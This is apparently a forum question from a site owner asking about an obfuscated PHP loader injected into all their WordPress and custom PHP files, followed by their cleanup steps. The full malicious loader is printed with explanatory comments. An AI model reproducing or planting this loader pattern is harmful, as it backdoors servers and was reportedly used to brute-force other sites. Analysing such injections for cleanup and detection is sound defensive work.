My server is infected with an XSS attack. All of the PHP files (all of WordPress, my custom .php scripts and applications) have been injected with a similar kind of encrypted (obfuscated) code, shown below.
What is the course of action in a situation like this? I've read about preventing XSS but couldn't find a solid guide on what to do once you have already been attacked.
Also, I wonder whether it is possible to decrypt the injected PHP code below:
<?php /*
 * Analyst note, added for readers; not part of the injected code.
 *
 * Structure: a two-stage loader. $wwykwjmqa holds scrambled text; the
 * statements after the string cut slices out of it, join them and run the
 * result as PHP. Nothing here is encrypted -- there is no key, and everything
 * needed to reverse it is in the file itself -- so "obfuscated" is the
 * accurate term.
 *
 * Because this is PHP stored in files on disk, it runs on the server each
 * time an infected file is requested. That is a server-side file compromise,
 * not cross-site scripting, which runs in a visitor's browser.
 *
 * Fragments readable inside the string (@error_reporting(0), $GLOBALS[,
 * function_exists(, strtolower($_SE..., strstr($uas,) show that the hidden
 * stage is itself PHP. They look like a test on a lowercased $_SERVER value,
 * but the full behaviour cannot be read from the scrambled form -- confirm on
 * an isolated copy.
 *
 * Traits usable for finding other infected files: a function name rebuilt
 * with a reversed mixed-case string, a variable called as a function,
 * arithmetic inside chr(), and a long comma-separated table of numbers.
 *
 * NOTE(review): in this copy the string has spaces in front of sequences such
 * as x27 and x24. The decoder below swaps chr(9) for chr(92), so these were
 * presumably tab characters in the original file; the offsets in the table
 * may therefore not line up against this copy.
 */ $wwykwjmqa = '281Ld]245]K2]285]Ke]53Ldd/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*4<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<7fw6<*K)ftpmdXA6|7**197*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*#>m%:|:*r%:-t%)3of:opjudo%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.mif((function_exists(" x6f 1#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)mg%!)!gj!<2,*j%!-#1]#-bu,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2-K)ebfsX x27u%)7fmjix2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%d($n)-1);} @error_reporting(0); $effwexo :>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)*#j{hnpd#)tutjyf`opjudovg x22)!gj}56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hn x7fw6*CW&)7gj6<*doj%7-C)fepmqz+sfwjidsb`bj+upcotn+qsvmt+fmhpph! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i# x24#-!#]y38#-!%w:**<")));$dsngrwc d%6<pd%w6Z6<.4`hA x27pd%6< x24- x24!>! x24/%tjw/ x24)% x24- x24y4 x24- x281]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27p!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!os!osvufs}w;* x7f!>> x22!pd%)!gj}Z!-id%)uqpuft`msvd},;um!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-4]y8 x24- x24]26 x24- x2b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%#<%tpz!>!#]D6M7]K3#<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! 
 x24/%tmw/ x24)%zW%h>EzH]672]48y]#>s%<#462]47y]252]18y]#>q%<qpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;]53]Kc]55Ld]55#*<%bG9}:}.}6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#/% x24- x24!>!fyqmpef)# x24*<!%t::!y3f]51L3]84]y31M6]y3e]81 x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#*!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeob6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw5 x52 137 x41 107 x45 116 x54"]); if ((strstr($uas," x6d 163 x69 11~!<2p% x7f!~!<##!>!2p%Z<^2 x5c8M7]381]211M5]67]452]88]5]48]32M3]316e"; function wfvpmkm($n){return chr(or323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]#762]67y]562]38y]572]48y]dy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&by84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]25x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24-%yy>#]D6]281L1#/#M5]DgP5]D6#<%f#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)d:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)pmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1111276<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudo.uofuopD#)sfebfI{*w%)kVOBALS[" x61 156 x75 156 x6de#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!g28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opobE{h%)tpqsut>j%!*72! 
 x27!hmg%)!gj!<2,*j%-#1]#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxc:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]W%c:>1<%b:>1<!gps)%j#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!-}!#*<%nfd>%fdy<Cb*[%h!>!= $haczumi("", $effwexo); $dg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:62 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 xpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<72qj%6<^#zsfvr# x5cqvg<~ x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44e*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ypd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppvufs!~<3,j%>j%!*3! x27!h*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc1"]=1; $uas=strtolower($_SE=])0#)U! 
 x27{**u%-#jt0}Z;0]=]0#pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x2-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB-*.%)euhA)3of>2bd%!<5h%/#0#/*#npS[" x61 156 x75 156 x61"])))) { $GL#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<j;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52fyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,45")) or (strstr($uas," x72 166 x3a 61 x31"))) { $haczumi = " x63 1w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%r%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj36* x7f_*#fubfsdXk5`{66~6<&w6<|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`= implode(array_map("wfvpmkm",42 x5f 163 x74 141 x72 164") && (!isset($GLOBALsngrwc();}}vg}k~~9{d%:osvufs:~928>> x22:ftmbg39*x{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;27]445]212]445]43]321]464]284]364]6]234]342]58]24]31#7]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<57ftbc x7f!|!*uyfu x27kmsvd}R;*msv%)}.;`UQPMSVDh%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]sv`ftsbqA7>q%6< x7fwppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2njA x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`str_split("%tjw!>!#]y84]275]y83]248]y83]256]yxB%h>#]y31]278]y3e]81mjg}[;ldpt%}K;`ufldpt}X;`7pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoFhopmA x273qj%6<*Y%)fnbozcYufhA x2)2q%l}S;2-u%!-#2#/#%#/#o]#/*) x7f x7f x7f<u%V x27{ftmfV xRVER[" x48 124 x54 120 x5f 125 x53 10sTrREvxNoiTCnuf_EtaerCxECalPer_Rtszbpugxmqd';
/*
 * chr(833-713) is chr(120), the letter "x". substr() takes 34 characters at
 * offset 5877 (40926-35049) of the string above and splits them on "x".
 * The string ends in "sTrREvxNoiTCnuf_EtaerCxECalPer_Rts" followed by nine
 * filler characters, so that is presumably the slice selected, giving the
 * pieces "sTrREv", "NoiTCnuf_EtaerC" and "ECalPer_Rts".
 */
$xadaat=explode(chr((833-713)),substr($wwykwjmqa,(40926-35049),(188-154)));
/*
 * Piece 0 is called as a function on pieces 1 and 2. PHP function names are
 * case-insensitive, so "sTrREv" resolves to strrev(); reversing the other two
 * pieces yields "Create_FuncTioN" and "stR_rePlaCE". After this line
 * $ghhrhvx names create_function and $ohxwtrqt names str_replace.
 */
$ghhrhvx = $xadaat[0]($xadaat[(6-5)]); $ohxwtrqt = $xadaat[0]($xadaat[(11-9)]);
/*
 * dulwdh($xjtystpc, $ukgzlz, $luupugng): reassembles the hidden text.
 * $xjtystpc is read as consecutive (offset, length) pairs; each pair selects
 * one substr() slice of $ukgzlz and the slices are concatenated in list order.
 * The joined text is then passed through $luupugng(chr(9), chr(92), ...);
 * with the callable supplied below that is str_replace, turning every tab
 * character into a backslash so that sequences such as x27 become escapes.
 * The function_exists() guard lets several injected files be loaded in one
 * request without a redeclaration error.
 */
if (!function_exists('dulwdh')) { function dulwdh($xjtystpc, $ukgzlz,$luupugng) { $bzudlnhrz = NULL; for($gynqittgr=0;$gynqittgr<(sizeof($xjtystpc)/2);$gynqittgr++) { $bzudlnhrz .= substr($ukgzlz, 
$xjtystpc[($gynqittgr*2)],$xjtystpc[($gynqittgr*2)+(4-3)]); } return $luupugng(chr((55-46)),chr((294-202)),$bzudlnhrz); }; }
/*
 * The offset/length table, split on chr(164-120), i.e. chr(44), a comma.
 * The pair 5840,37 ends exactly at offset 5877, where the function-name slice
 * used above begins.
 */
$fjslgcupn = explode(chr((164-120)),'333,27,5103,47,4482,35,3015,26,4296,27,5840,37,1993,66,4769,67,3755,52,2126,39,579,41,5073,30,5558,45,1075,67,1002,26,4354,38,5649,49,2818,70,493,21,2888,49,1656,37,126,23,4392,58,4934,63,5750,33,3840,20,4882,52,284,49,5442,20,4997,29,733,30,5511,47,2624,50,4708,61,1924,69,1622,34,3373,49,5624,25,5359,24,1219,21,1548,48,1187,32,4596,62,1142,45,4098,24,404,24,3171,44,2570,54,2743,43,1240,49,862,43,149,54,650,34,2059,31,514,65,4450,32,24,53,1366,61,1864,60,763,33,3215,58,3807,33,4122,63,2354,60,3136,35,4517,43,5026,47,5336,23,2674,69,2937,55,5161,37,684,49,4046,52,3041,57,3422,60,5812,28,2786,32,5462,49,5698,52,2992,23,5198,38,1693,70,4323,31,5783,29,2165,41,2414,63,5288,48,5383,59,3098,38,3988,58,1512,36,2206,25,203,25,3860,67,2477,62,1823,41,1028,47,1342,24,77,49,796,66,1763,36,905,61,3927,61,3273,44,1447,65,428,65,4836,46,5603,21,4658,50,4185,45,1799,24,4230,66,1427,20,2539,31,2231,54,3317,36,0,24,1596,26,3566,25,228,56,2285,69,2090,36,5236,52,3682,44,3726,29,3353,20,620,30,3482,64,3546,20,4560,36,3619,63,1289,53,360,44,966,36,3591,28,5150,11');
/*
 * The reassembled text becomes the body of an anonymous function with an
 * empty argument list. create_function() was deprecated in PHP 7.2 and
 * removed in PHP 8.0, so this loader depends on an older runtime.
 */
$cagbthgj = $ghhrhvx("",dulwdh($fjslgcupn,$wwykwjmqa,$ohxwtrqt));
/*
 * $cagbthgj("") is the point where the hidden stage actually executes. The
 * remaining assignments overwrite the loader's variables (with the payload
 * string, then the integers 121 and 120), presumably to leave less behind in
 * the including script's scope.
 */
$ghhrhvx=$wwykwjmqa; $cagbthgj(""); $cagbthgj=(638-517); $wwykwjmqa=$cagbthgj-1; ?>
I would just like to understand what it does and where it got in.
Thanks in advance for all the help!
OK, so I wanted to share an update and close this. Here is what I did to recover from the injection on my server.
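1) Wrote a script that goes through every PHP file and looks for the injected code; if it is found, the script removes it. (The injected code has a similar beginning and ending pattern.) A pattern match like this only catches this one variant, so it does not rule out other backdoor files or show where the attacker got in.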
2) Changed passwords for server logins.
3) Updated the very, very old WordPress sites on the server.
It seems that this injected code was being used for brute-forcing other WordPress sites and cPanels, by the way.